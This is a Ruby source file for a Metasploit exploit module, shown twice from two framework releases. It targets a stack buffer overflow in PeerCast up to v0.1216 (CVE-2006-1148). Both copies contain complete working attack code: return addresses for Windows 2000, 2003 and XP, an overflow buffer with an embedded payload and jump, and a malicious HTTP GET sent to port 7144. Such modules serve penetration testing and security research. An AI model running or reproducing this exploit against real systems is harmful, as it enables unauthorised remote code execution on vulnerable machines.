==> metasploit-framework_4.16.32.orig.tar.gz: metasploit-framework-4.16.32/modules/exploits/windows/http/peercast_url.rb <==
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'PeerCast URL Handling Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in PeerCast <= v0.1216.
        The vulnerability is caused due to a boundary error within the
        handling of URL parameters.
      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2006-1148'],
          ['OSVDB', '23777'],
          ['BID', '17040']
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'    => 400,
          'BadChars' => "\x00\x0a\x0d\x20\x0d\x2f\x3d\x3b",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],
          ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],
          ['Windows XP English SP0/SP1',   { 'Ret' => 0x77dbfa2c }],
          ['Windows XP English SP0/SP2',   { 'Ret' => 0x77dc12b8 }],
        ],
      'DisclosureDate' => 'Mar 8 2006'))

    register_options( [ Opt::RPORT(7144) ])
  end

  def exploit
    connect

    pat = rand_text_alphanumeric(1024)
    pat[768, 4] = [target.ret].pack('V')
    pat[812, 5] = [0xe9, -517].pack('CV')
    pat[300, payload.encoded.length] = payload.encoded

    uri = '/stream/?' + pat

    res = "GET #{uri} HTTP/1.0\r\n\r\n"

    print_status("Trying target address 0x%.8x..." % target.ret)
    sock.put(res)
    sock.close

    handler
    disconnect
  end
end

==> metasploit-framework_6.1.27.orig.tar.gz: metasploit-framework-6.1.27/modules/exploits/windows/http/peercast_url.rb <==
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'PeerCast URL Handling Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in PeerCast <= v0.1216.
        The vulnerability is caused due to a boundary error within the
        handling of URL parameters.
      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2006-1148'],
          ['OSVDB', '23777'],
          ['BID', '17040']
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'    => 400,
          'BadChars' => "\x00\x0a\x0d\x20\x0d\x2f\x3d\x3b",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],
          ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],
          ['Windows XP English SP0/SP1',   { 'Ret' => 0x77dbfa2c }],
          ['Windows XP English SP0/SP2',   { 'Ret' => 0x77dc12b8 }],
        ],
      'DisclosureDate' => '2006-03-08'))

    register_options( [ Opt::RPORT(7144) ])
  end

  def exploit
    connect

    pat = rand_text_alphanumeric(1024)
    pat[768, 4] = [target.ret].pack('V')
    pat[812, 5] = [0xe9, -517].pack('CV')
    pat[300, payload.encoded.length] = payload.encoded

    uri = '/stream/?' + pat

    res = "GET #{uri} HTTP/1.0\r\n\r\n"

    print_status("Trying target address 0x%.8x..." % target.ret)
    sock.put(res)
    sock.close

    handler
    disconnect
  end
end
